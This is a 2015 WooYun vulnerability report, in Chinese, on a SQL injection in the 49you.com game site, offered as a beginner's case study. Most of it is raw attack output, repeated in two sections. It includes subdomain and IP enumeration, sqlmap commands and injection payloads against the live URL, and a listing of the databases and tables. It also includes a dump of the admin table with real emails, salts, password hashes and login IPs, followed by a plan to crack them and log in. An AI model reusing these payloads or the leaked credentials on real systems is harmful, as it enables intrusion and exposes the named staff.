当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123305

漏洞标题:四九游网页游戏主站某处伪静态存在SQL注入影响2个数据库100张表(包括管理员帐号密码)送初学者案例

相关厂商:49you.com

漏洞作者: ’‘Nome

提交时间:2015-06-29 08:49

修复时间:2015-08-13 10:26

公开时间:2015-08-13 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

目测该公司也就2个数据库 一个存储数据的,一个配置的

详细说明:

用lijiejie的神器先挖二级域名

blog.49you.com                120.31.134.71                                   
www.49you.com                 120.26.12.115                                   
cs.49you.com                  120.26.12.115                                   
i.49you.com                   121.10.246.74                                   
user.49you.com                120.26.12.115                                   
mail.49you.com                112.90.78.157, 112.90.77.178                    
pay.49you.com                 120.26.12.115                                   
bbs.49you.com                 122.13.176.71                                   
shop.49you.com                120.26.12.115                                   
h5.49you.com                  61.136.166.94, 120.26.12.115                    
m.49you.com                   119.38.128.234                                  
gm.49you.com                  119.38.128.227                                  
status.49you.com              112.91.150.231                                  
api.49you.com                 119.38.128.229, 119.38.128.228                  
all.49you.com                 183.6.152.58                                    
met.49you.com                 222.132.16.231, 222.132.16.232                  
dj.49you.com                  211.147.224.152                                 
adv.49you.com                 120.26.3.80                                     
customer.49you.com            121.10.246.67                                   
vpn.49you.com                 112.90.180.118                                  
stage.49you.com               120.26.3.80                                     
ml.49you.com                  120.26.3.86                                     
m.49you.com                   119.38.128.234                                  
count.adv.49you.com           119.38.128.236                                  
                      24 found | 0 remaining | 34009 scanned in 417.17 secondsro


然后进行挨个网站进入
进入到

http://i.49you.com/news/item/catid/55*/id*/15*.html

的时候进行sql注入测试
root@kali:~# sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150520}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:25:41
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:25:42] [INFO] testing connection to the target URL
[15:25:43] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:25:44] [INFO] target URL is stable
[15:25:44] [INFO] testing if URI parameter '#1*' is dynamic
[15:25:44] [INFO] confirming that URI parameter '#1*' is dynamic
[15:25:44] [WARNING] URI parameter '#1*' does not appear dynamic
[15:25:44] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[15:25:44] [INFO] testing for SQL injection on URI parameter '#1*'
[15:25:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:46] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:48] [INFO] testing 'MySQL inline queries'
[15:25:48] [INFO] testing 'PostgreSQL inline queries'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:25:48] [INFO] testing 'Oracle inline queries'
[15:25:48] [INFO] testing 'SQLite inline queries'
[15:25:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:25:48] [WARNING] time-based comparison requires larger statistical model, please wait....
[15:25:59] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 stacked queries' injectable
[15:25:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[15:26:09] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[15:26:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:26:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:26:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:26:10] [INFO] target URL appears to have 6 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[15:26:19] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:27:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:27:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[15:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:27:19
有戏。。。。。55存在伪静态注入
开始查询有多少个数据库: sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" --dbs

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:28:57] [INFO] resuming back-end DBMS 'mysql' 
[15:28:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:28:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:28:58] [INFO] fetching database names
[15:28:58] [INFO] the SQL query used returns 2 entries
[15:28:58] [INFO] retrieved: information_schema
[15:28:58] [INFO] retrieved: i_49you
available databases [2]:                                                                                                                             
[*] i_49you
[*] information_schema
[15:28:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[15:28:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:28:59


俩个数据库 第一个数据库有管理员的表,第二个也就是配置库了
进下来进入库子 :sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" --tables

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:29:31] [INFO] resuming back-end DBMS 'mysql' 
[15:29:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:29:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:29:32] [INFO] fetching tables for database: 'i_49you'
[15:29:32] [INFO] the SQL query used returns 100 entries
[15:29:32] [INFO] retrieved: admin
[15:29:32] [INFO] retrieved: admin_panel
[15:29:32] [INFO] retrieved: admin_role
[15:29:32] [INFO] retrieved: admin_role_priv
[15:29:33] [INFO] retrieved: announce
[15:29:33] [INFO] retrieved: attachment
[15:29:33] [INFO] retrieved: attachment_index
[15:29:33] [INFO] retrieved: badword
[15:29:33] [INFO] retrieved: block
[15:29:33] [INFO] retrieved: block_history
[15:29:33] [INFO] retrieved: block_priv
[15:29:34] [INFO] retrieved: cache
[15:29:34] [INFO] retrieved: category
[15:29:34] [INFO] retrieved: category_priv
[15:29:34] [INFO] retrieved: collection_content
[15:29:34] [INFO] retrieved: collection_history
[15:29:34] [INFO] retrieved: collection_node
[15:29:35] [INFO] retrieved: collection_program
[15:29:35] [INFO] retrieved: content_check
[15:29:35] [INFO] retrieved: copyfrom
[15:29:35] [INFO] retrieved: datacall
[15:29:35] [INFO] retrieved: dbsource
[15:29:35] [INFO] retrieved: download
[15:29:35] [INFO] retrieved: download_data
[15:29:36] [INFO] retrieved: downservers
[15:29:36] [INFO] retrieved: extend_setting
[15:29:36] [INFO] retrieved: favorite
[15:29:36] [INFO] retrieved: game
[15:29:36] [INFO] retrieved: game_data
[15:29:36] [INFO] retrieved: hits
[15:29:37] [INFO] retrieved: ipbanned
[15:29:37] [INFO] retrieved: keylink
[15:29:37] [INFO] retrieved: keyword
[15:29:37] [INFO] retrieved: keyword_data
[15:29:37] [INFO] retrieved: link
[15:29:37] [INFO] retrieved: linkage
[15:29:37] [INFO] retrieved: log
[15:29:38] [INFO] retrieved: member
[15:29:38] [INFO] retrieved: member_detail
[15:29:38] [INFO] retrieved: member_group
[15:29:38] [INFO] retrieved: member_menu
[15:29:38] [INFO] retrieved: member_verify
[15:29:38] [INFO] retrieved: member_vip
[15:29:39] [INFO] retrieved: menu
[15:29:39] [INFO] retrieved: message
[15:29:39] [INFO] retrieved: message_data
[15:29:39] [INFO] retrieved: message_group
[15:29:39] [INFO] retrieved: model
[15:29:39] [INFO] retrieved: model_field
[15:29:39] [INFO] retrieved: module
[15:29:40] [INFO] retrieved: mood
[15:29:40] [INFO] retrieved: news
[15:29:40] [INFO] retrieved: news_data
[15:29:40] [INFO] retrieved: page
[15:29:40] [INFO] retrieved: pay_account
[15:29:40] [INFO] retrieved: pay_payment
[15:29:41] [INFO] retrieved: pay_spend
[15:29:41] [INFO] retrieved: position
[15:29:41] [INFO] retrieved: position_data
[15:29:41] [INFO] retrieved: poster
[15:29:41] [INFO] retrieved: poster_201409
[15:29:41] [INFO] retrieved: poster_201506
[15:29:42] [INFO] retrieved: poster_space
[15:29:42] [INFO] retrieved: queue
[15:29:42] [INFO] retrieved: release_point
[15:29:42] [INFO] retrieved: search
[15:29:42] [INFO] retrieved: search_keyword
[15:29:42] [INFO] retrieved: session
[15:29:43] [INFO] retrieved: site
[15:29:43] [INFO] retrieved: sms_report
[15:29:43] [INFO] retrieved: special
[15:29:43] [INFO] retrieved: special_c_data
[15:29:43] [INFO] retrieved: special_content
[15:29:43] [INFO] retrieved: sphinx_counter
[15:29:43] [INFO] retrieved: sqlmapoutput
[15:29:44] [INFO] retrieved: sso_admin
[15:29:44] [INFO] retrieved: sso_applications
[15:29:44] [INFO] retrieved: sso_members
[15:29:44] [INFO] retrieved: sso_messagequeue
[15:29:44] [INFO] retrieved: sso_session
[15:29:44] [INFO] retrieved: sso_settings
[15:29:45] [INFO] retrieved: tag
[15:29:45] [INFO] retrieved: template_bak
[15:29:45] [INFO] retrieved: test_artice
[15:29:45] [INFO] retrieved: test_artice_data
[15:29:45] [INFO] retrieved: test_picture
[15:29:45] [INFO] retrieved: test_picture_data
[15:29:45] [INFO] retrieved: times
[15:29:46] [INFO] retrieved: type
[15:29:46] [INFO] retrieved: urlrule
[15:29:46] [INFO] retrieved: video
[15:29:46] [INFO] retrieved: video_content
[15:29:46] [INFO] retrieved: video_data
[15:29:46] [INFO] retrieved: video_store
[15:29:47] [INFO] retrieved: vote_data
[15:29:47] [INFO] retrieved: vote_option
[15:29:47] [INFO] retrieved: vote_subject
[15:29:47] [INFO] retrieved: wap
[15:29:47] [INFO] retrieved: wap_type
[15:29:47] [INFO] retrieved: workflow
Database: i_49you                                                                                                                                    
[100 tables]
+--------------------+
| module             |
| position           |
| session            |
| admin              |
| admin_panel        |
| admin_role         |
| admin_role_priv    |
| announce           |
| attachment         |
| attachment_index   |
| badword            |
| block              |
| block_history      |
| block_priv         |
| cache              |
| category           |
| category_priv      |
| collection_content |
| collection_history |
| collection_node    |
| collection_program |
| content_check      |
| copyfrom           |
| datacall           |
| dbsource           |
| download           |
| download_data      |
| downservers        |
| extend_setting     |
| favorite           |
| game               |
| game_data          |
| hits               |
| ipbanned           |
| keylink            |
| keyword            |
| keyword_data       |
| link               |
| linkage            |
| log                |
| member             |
| member_detail      |
| member_group       |
| member_menu        |
| member_verify      |
| member_vip         |
| menu               |
| message            |
| message_data       |
| message_group      |
| model              |
| model_field        |
| mood               |
| news               |
| news_data          |
| page               |
| pay_account        |
| pay_payment        |
| pay_spend          |
| position_data      |
| poster             |
| poster_201409      |
| poster_201506      |
| poster_space       |
| queue              |
| release_point      |
| search             |
| search_keyword     |
| site               |
| sms_report         |
| special            |
| special_c_data     |
| special_content    |
| sphinx_counter     |
| sqlmapoutput       |
| sso_admin          |
| sso_applications   |
| sso_members        |
| sso_messagequeue   |
| sso_session        |
| sso_settings       |
| tag                |
| template_bak       |
| test_artice        |
| test_artice_data   |
| test_picture       |
| test_picture_data  |
| times              |
| type               |
| urlrule            |
| video              |
| video_content      |
| video_data         |
| video_store        |
| vote_data          |
| vote_option        |
| vote_subject       |
| wap                |
| wap_type           |
| workflow           |
+--------------------+
[15:29:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 101 times
[15:29:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:29:48


100张表
下一步:
sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" -T "admin"--dump
进管理员表:
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| roleid | userid | lang | card | email | encrypt | username | realname | password | lastloginip | lastlogintime |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| 1 | 1 | <blank> | <blank> | tanxz@49app.com | s6SCI6 | admin | <blank> | 6074e9112bb7fe18a8aadb8495f73df7 | 113.99.0.43 | 1431054485 |
| 2 | 2 | <blank> | <blank> | fdsafds@qq.com | v9XvY2 | livebasic | test | 27357894d16487c7bb2e196a4d0f77e8 | 183.131.11.101 | 1411466593 |
| 2 | 3 | <blank> | <blank> | qianhm@49app.com | HSCAPv | meimei | 每每 | f1e0824af35f2380c22b730bfdf36e4c | 183.6.152.58 | 1417662909 |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+-------

2015-06-28 16:23:02的屏幕截图.png


2015-06-28 16:24:12的屏幕截图.png

最后一步,解密进后台
完工~~~~撤。。。
接下来

漏洞证明:

用lijiejie的神器先挖二级域名

blog.49you.com                120.31.134.71                                   
www.49you.com                 120.26.12.115                                   
cs.49you.com                  120.26.12.115                                   
i.49you.com                   121.10.246.74                                   
user.49you.com                120.26.12.115                                   
mail.49you.com                112.90.78.157, 112.90.77.178                    
pay.49you.com                 120.26.12.115                                   
bbs.49you.com                 122.13.176.71                                   
shop.49you.com                120.26.12.115                                   
h5.49you.com                  61.136.166.94, 120.26.12.115                    
m.49you.com                   119.38.128.234                                  
gm.49you.com                  119.38.128.227                                  
status.49you.com              112.91.150.231                                  
api.49you.com                 119.38.128.229, 119.38.128.228                  
all.49you.com                 183.6.152.58                                    
met.49you.com                 222.132.16.231, 222.132.16.232                  
dj.49you.com                  211.147.224.152                                 
adv.49you.com                 120.26.3.80                                     
customer.49you.com            121.10.246.67                                   
vpn.49you.com                 112.90.180.118                                  
stage.49you.com               120.26.3.80                                     
ml.49you.com                  120.26.3.86                                     
m.49you.com                   119.38.128.234                                  
count.adv.49you.com           119.38.128.236                                  
                      24 found | 0 remaining | 34009 scanned in 417.17 secondsro


然后进行挨个网站进入
进入到

http://i.49you.com/news/item/catid/55*/id*/15*.html

的时候进行sql注入测试
root@kali:~# sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150520}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:25:41
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:25:42] [INFO] testing connection to the target URL
[15:25:43] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:25:44] [INFO] target URL is stable
[15:25:44] [INFO] testing if URI parameter '#1*' is dynamic
[15:25:44] [INFO] confirming that URI parameter '#1*' is dynamic
[15:25:44] [WARNING] URI parameter '#1*' does not appear dynamic
[15:25:44] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[15:25:44] [INFO] testing for SQL injection on URI parameter '#1*'
[15:25:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:46] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:48] [INFO] testing 'MySQL inline queries'
[15:25:48] [INFO] testing 'PostgreSQL inline queries'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:25:48] [INFO] testing 'Oracle inline queries'
[15:25:48] [INFO] testing 'SQLite inline queries'
[15:25:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:25:48] [WARNING] time-based comparison requires larger statistical model, please wait....
[15:25:59] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 stacked queries' injectable
[15:25:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[15:26:09] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[15:26:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:26:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:26:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:26:10] [INFO] target URL appears to have 6 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[15:26:19] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:27:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:27:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[15:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:27:19
有戏。。。。。55存在伪静态注入
开始查询有多少个数据库: sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" --dbs

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:28:57] [INFO] resuming back-end DBMS 'mysql' 
[15:28:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:28:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:28:58] [INFO] fetching database names
[15:28:58] [INFO] the SQL query used returns 2 entries
[15:28:58] [INFO] retrieved: information_schema
[15:28:58] [INFO] retrieved: i_49you
available databases [2]:                                                                                                                             
[*] i_49you
[*] information_schema
[15:28:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[15:28:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:28:59


俩个数据库 第一个数据库有管理员的表,第二个也就是配置库了
进下来进入库子 :sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" --tables

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:29:31] [INFO] resuming back-end DBMS 'mysql' 
[15:29:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:29:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:29:32] [INFO] fetching tables for database: 'i_49you'
[15:29:32] [INFO] the SQL query used returns 100 entries
[15:29:32] [INFO] retrieved: admin
[15:29:32] [INFO] retrieved: admin_panel
[15:29:32] [INFO] retrieved: admin_role
[15:29:32] [INFO] retrieved: admin_role_priv
[15:29:33] [INFO] retrieved: announce
[15:29:33] [INFO] retrieved: attachment
[15:29:33] [INFO] retrieved: attachment_index
[15:29:33] [INFO] retrieved: badword
[15:29:33] [INFO] retrieved: block
[15:29:33] [INFO] retrieved: block_history
[15:29:33] [INFO] retrieved: block_priv
[15:29:34] [INFO] retrieved: cache
[15:29:34] [INFO] retrieved: category
[15:29:34] [INFO] retrieved: category_priv
[15:29:34] [INFO] retrieved: collection_content
[15:29:34] [INFO] retrieved: collection_history
[15:29:34] [INFO] retrieved: collection_node
[15:29:35] [INFO] retrieved: collection_program
[15:29:35] [INFO] retrieved: content_check
[15:29:35] [INFO] retrieved: copyfrom
[15:29:35] [INFO] retrieved: datacall
[15:29:35] [INFO] retrieved: dbsource
[15:29:35] [INFO] retrieved: download
[15:29:35] [INFO] retrieved: download_data
[15:29:36] [INFO] retrieved: downservers
[15:29:36] [INFO] retrieved: extend_setting
[15:29:36] [INFO] retrieved: favorite
[15:29:36] [INFO] retrieved: game
[15:29:36] [INFO] retrieved: game_data
[15:29:36] [INFO] retrieved: hits
[15:29:37] [INFO] retrieved: ipbanned
[15:29:37] [INFO] retrieved: keylink
[15:29:37] [INFO] retrieved: keyword
[15:29:37] [INFO] retrieved: keyword_data
[15:29:37] [INFO] retrieved: link
[15:29:37] [INFO] retrieved: linkage
[15:29:37] [INFO] retrieved: log
[15:29:38] [INFO] retrieved: member
[15:29:38] [INFO] retrieved: member_detail
[15:29:38] [INFO] retrieved: member_group
[15:29:38] [INFO] retrieved: member_menu
[15:29:38] [INFO] retrieved: member_verify
[15:29:38] [INFO] retrieved: member_vip
[15:29:39] [INFO] retrieved: menu
[15:29:39] [INFO] retrieved: message
[15:29:39] [INFO] retrieved: message_data
[15:29:39] [INFO] retrieved: message_group
[15:29:39] [INFO] retrieved: model
[15:29:39] [INFO] retrieved: model_field
[15:29:39] [INFO] retrieved: module
[15:29:40] [INFO] retrieved: mood
[15:29:40] [INFO] retrieved: news
[15:29:40] [INFO] retrieved: news_data
[15:29:40] [INFO] retrieved: page
[15:29:40] [INFO] retrieved: pay_account
[15:29:40] [INFO] retrieved: pay_payment
[15:29:41] [INFO] retrieved: pay_spend
[15:29:41] [INFO] retrieved: position
[15:29:41] [INFO] retrieved: position_data
[15:29:41] [INFO] retrieved: poster
[15:29:41] [INFO] retrieved: poster_201409
[15:29:41] [INFO] retrieved: poster_201506
[15:29:42] [INFO] retrieved: poster_space
[15:29:42] [INFO] retrieved: queue
[15:29:42] [INFO] retrieved: release_point
[15:29:42] [INFO] retrieved: search
[15:29:42] [INFO] retrieved: search_keyword
[15:29:42] [INFO] retrieved: session
[15:29:43] [INFO] retrieved: site
[15:29:43] [INFO] retrieved: sms_report
[15:29:43] [INFO] retrieved: special
[15:29:43] [INFO] retrieved: special_c_data
[15:29:43] [INFO] retrieved: special_content
[15:29:43] [INFO] retrieved: sphinx_counter
[15:29:43] [INFO] retrieved: sqlmapoutput
[15:29:44] [INFO] retrieved: sso_admin
[15:29:44] [INFO] retrieved: sso_applications
[15:29:44] [INFO] retrieved: sso_members
[15:29:44] [INFO] retrieved: sso_messagequeue
[15:29:44] [INFO] retrieved: sso_session
[15:29:44] [INFO] retrieved: sso_settings
[15:29:45] [INFO] retrieved: tag
[15:29:45] [INFO] retrieved: template_bak
[15:29:45] [INFO] retrieved: test_artice
[15:29:45] [INFO] retrieved: test_artice_data
[15:29:45] [INFO] retrieved: test_picture
[15:29:45] [INFO] retrieved: test_picture_data
[15:29:45] [INFO] retrieved: times
[15:29:46] [INFO] retrieved: type
[15:29:46] [INFO] retrieved: urlrule
[15:29:46] [INFO] retrieved: video
[15:29:46] [INFO] retrieved: video_content
[15:29:46] [INFO] retrieved: video_data
[15:29:46] [INFO] retrieved: video_store
[15:29:47] [INFO] retrieved: vote_data
[15:29:47] [INFO] retrieved: vote_option
[15:29:47] [INFO] retrieved: vote_subject
[15:29:47] [INFO] retrieved: wap
[15:29:47] [INFO] retrieved: wap_type
[15:29:47] [INFO] retrieved: workflow
Database: i_49you                                                                                                                                    
[100 tables]
+--------------------+
| module             |
| position           |
| session            |
| admin              |
| admin_panel        |
| admin_role         |
| admin_role_priv    |
| announce           |
| attachment         |
| attachment_index   |
| badword            |
| block              |
| block_history      |
| block_priv         |
| cache              |
